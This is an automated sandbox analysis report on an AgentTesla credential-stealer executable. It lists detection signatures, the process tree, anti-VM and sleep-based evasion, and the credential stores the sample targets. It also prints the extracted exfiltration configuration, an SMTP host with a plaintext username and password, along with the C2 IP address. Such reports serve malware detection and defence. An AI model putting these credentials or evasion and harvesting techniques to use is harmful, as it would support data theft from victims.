Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:830908
MD5:856572778608242656795bd15cc3683c
SHA1:ef79e01019b9518fa82e8dc628d416cd9ccd7817
SHA256:be316d90b0e5c1f88f32fa6dc7cf5b2c760c8ea63e7ddec3e2303cccf8ae25f9
Tags:exe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Detected unpacking (overwrites its own PE header)
Yara detected AgentTesla
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Detected unpacking (creates a PE file in dynamic memory)
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • file.exe (PID: 1544 cmdline: C:\Users\user\Desktop\file.exe MD5: 856572778608242656795BD15CC3683C)
    • zjlxnt.exe (PID: 5320 cmdline: "C:\Users\user\AppData\Local\Temp\zjlxnt.exe" C:\Users\user\AppData\Local\Temp\anaictjg.cte MD5: A22E128E1C66E8E76F2F05CA2D81A8F1)
      • conhost.exe (PID: 4496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • zjlxnt.exe (PID: 6076 cmdline: C:\Users\user\AppData\Local\Temp\zjlxnt.exe MD5: A22E128E1C66E8E76F2F05CA2D81A8F1)
  • cleanup
{"Exfil Mode": "SMTP", "Host": "us2.smtp.mailhostbox.com", "Username": "log3@forrwel.net", "Password": "HNnNLPY3          "}
SourceRuleDescriptionAuthorStrings
00000003.00000002.575938781.0000000002391000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000003.00000002.575938781.0000000002391000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: zjlxnt.exe PID: 6076JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        Process Memory Space: zjlxnt.exe PID: 6076JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          No Sigma rule has matched
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: file.exeReversingLabs: Detection: 48%
          Source: file.exeVirustotal: Detection: 47%Perma Link
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeReversingLabs: Detection: 41%
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeVirustotal: Detection: 34%Perma Link
          Source: file.exeJoe Sandbox ML: detected
          Source: 3.2.zjlxnt.exe.4800000.4.unpackAvira: Label: TR/Spy.Gen8
          Source: 3.2.zjlxnt.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
          Source: 3.2.zjlxnt.exe.417058.1.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "us2.smtp.mailhostbox.com", "Username": "log3@forrwel.net", "Password": "HNnNLPY3 "}

          Compliance

          barindex
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeUnpacked PE file: 3.2.zjlxnt.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeUnpacked PE file: 3.2.zjlxnt.exe.4800000.4.unpack
          Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: wntdll.pdbUGP source: zjlxnt.exe, 00000001.00000003.312180098.000000001A280000.00000004.00001000.00020000.00000000.sdmp, zjlxnt.exe, 00000001.00000003.313487812.000000001A0F0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: zjlxnt.exe, 00000001.00000003.312180098.000000001A280000.00000004.00001000.00020000.00000000.sdmp, zjlxnt.exe, 00000001.00000003.313487812.000000001A0F0000.00000004.00001000.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeCode function: 1_2_004089F8 FindFirstFileExW,1_2_004089F8
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeCode function: 3_2_00406715 FindFirstFileExW,3_2_00406715
          Source: Joe Sandbox ViewIP Address: 208.91.199.224 208.91.199.224
          Source: global trafficTCP traffic: 192.168.2.5:49703 -> 208.91.199.224:587
          Source: global trafficTCP traffic: 192.168.2.5:49703 -> 208.91.199.224:587
          Source: zjlxnt.exe, 00000003.00000002.575938781.00000000023E9000.00000004.00000800.00020000.00000000.sdmp, zjlxnt.exe, 00000003.00000002.577003560.0000000005458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
          Source: zjlxnt.exe, 00000003.00000002.575938781.00000000023E9000.00000004.00000800.00020000.00000000.sdmp, zjlxnt.exe, 00000003.00000002.577003560.0000000005458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: zjlxnt.exe, 00000003.00000002.577003560.0000000005458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.usertru
          Source: zjlxnt.exe, 00000003.00000002.575938781.00000000023E9000.00000004.00000800.00020000.00000000.sdmp, zjlxnt.exe, 00000003.00000002.577003560.0000000005458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
          Source: zjlxnt.exe, 00000003.00000002.577003560.0000000005458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo?
          Source: file.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: zjlxnt.exe, 00000003.00000002.575938781.00000000023E9000.00000004.00000800.00020000.00000000.sdmp, zjlxnt.exe, 00000003.00000002.577003560.0000000005458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
          Source: zjlxnt.exe, 00000003.00000002.575938781.00000000023E9000.00000004.00000800.00020000.00000000.sdmp, zjlxnt.exe, 00000003.00000002.577003560.0000000005458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0A
          Source: zjlxnt.exe, 00000003.00000002.575938781.00000000023E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
          Source: zjlxnt.exe, 00000003.00000002.575938781.00000000023E9000.00000004.00000800.00020000.00000000.sdmp, zjlxnt.exe, 00000003.00000002.577003560.0000000005458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
          Source: unknownDNS traffic detected: queries for: us2.smtp.mailhostbox.com
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405809
          Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406D5F0_2_00406D5F
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeCode function: 1_2_004103711_2_00410371
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeCode function: 3_2_0040CBD13_2_0040CBD1
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeCode function: 3_2_021772383_2_02177238
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeCode function: 3_2_0217C2D03_2_0217C2D0
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeCode function: 3_2_02177E503_2_02177E50
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeCode function: 3_2_021702C23_2_021702C2
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeCode function: 3_2_021775803_2_02177580
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeCode function: 3_2_0521AA2B3_2_0521AA2B
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeCode function: String function: 004019C0 appears 42 times
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeCode function: String function: 00401EE0 appears 33 times
          Source: file.exeReversingLabs: Detection: 48%
          Source: file.exeVirustotal: Detection: 47%
          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
          Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\zjlxnt.exe "C:\Users\user\AppData\Local\Temp\zjlxnt.exe" C:\Users\user\AppData\Local\Temp\anaictjg.cte
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess created: C:\Users\user\AppData\Local\Temp\zjlxnt.exe C:\Users\user\AppData\Local\Temp\zjlxnt.exe
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\zjlxnt.exe "C:\Users\user\AppData\Local\Temp\zjlxnt.exe" C:\Users\user\AppData\Local\Temp\anaictjg.cteJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess created: C:\Users\user\AppData\Local\Temp\zjlxnt.exe C:\Users\user\AppData\Local\Temp\zjlxnt.exeJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\nsi8BD6.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/4@1/1
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404AB5
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4496:120:WilError_01
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeCode function: 3_2_0040147B GetModuleHandleW,GetModuleHandleW,FindResourceW,GetModuleHandleW,LoadResource,LockResource,GetModuleHandleW,SizeofResource,FreeResource,ExitProcess,3_2_0040147B
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeCommand line argument: A1_2_00410940
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: wntdll.pdbUGP source: zjlxnt.exe, 00000001.00000003.312180098.000000001A280000.00000004.00001000.00020000.00000000.sdmp, zjlxnt.exe, 00000001.00000003.313487812.000000001A0F0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: zjlxnt.exe, 00000001.00000003.312180098.000000001A280000.00000004.00001000.00020000.00000000.sdmp, zjlxnt.exe, 00000001.00000003.313487812.000000001A0F0000.00000004.00001000.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeUnpacked PE file: 3.2.zjlxnt.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeUnpacked PE file: 3.2.zjlxnt.exe.400000.0.unpack .text:ER;.rdata:R;.data:W; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeUnpacked PE file: 3.2.zjlxnt.exe.4800000.4.unpack
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeCode function: 1_2_00410AA4 push ecx; ret 1_2_00410AB7
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeCode function: 3_2_0040D2E1 push ecx; ret 3_2_0040D2F4
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeCode function: 3_2_02171B70 push eax; iretd 3_2_02171B79
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\zjlxnt.exeJump to dropped file
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exe TID: 752Thread sleep count: 6545 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exe TID: 5644Thread sleep time: -15679732462653109s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exe TID: 5644Thread sleep time: -100000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exe TID: 5644Thread sleep time: -99888s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exe TID: 5644Thread sleep time: -99781s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exe TID: 5644Thread sleep time: -99671s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exe TID: 5644Thread sleep time: -99562s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exe TID: 5644Thread sleep time: -99452s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exe TID: 5644Thread sleep time: -99343s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exe TID: 5644Thread sleep time: -99234s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exe TID: 5644Thread sleep time: -99123s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exe TID: 5644Thread sleep time: -99013s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exe TID: 5644Thread sleep time: -98906s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exe TID: 5644Thread sleep time: -98796s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exe TID: 5644Thread sleep time: -98687s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exe TID: 5644Thread sleep time: -98578s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exe TID: 5644Thread sleep time: -98466s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exe TID: 5644Thread sleep time: -98358s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exe TID: 5644Thread sleep time: -98250s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exe TID: 5644Thread sleep time: -98136s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exe TID: 5644Thread sleep time: -98006s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exe TID: 5644Thread sleep time: -97844s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exe TID: 5644Thread sleep time: -97723s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exe TID: 5644Thread sleep time: -97594s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exe TID: 5644Thread sleep time: -97485s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exe TID: 5644Thread sleep time: -97344s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exe TID: 5644Thread sleep time: -97204s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exe TID: 5644Thread sleep time: -97056s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exe TID: 5644Thread sleep time: -96952s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exe TID: 5644Thread sleep time: -96843s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exe TID: 5644Thread sleep time: -96735s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exe TID: 5644Thread sleep time: -96625s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exe TID: 5644Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeWindow / User API: threadDelayed 6545Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeCode function: 1_2_004089F8 FindFirstFileExW,1_2_004089F8
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeCode function: 3_2_00406715 FindFirstFileExW,3_2_00406715
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeThread delayed: delay time: 100000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeThread delayed: delay time: 99888Jump to behavior
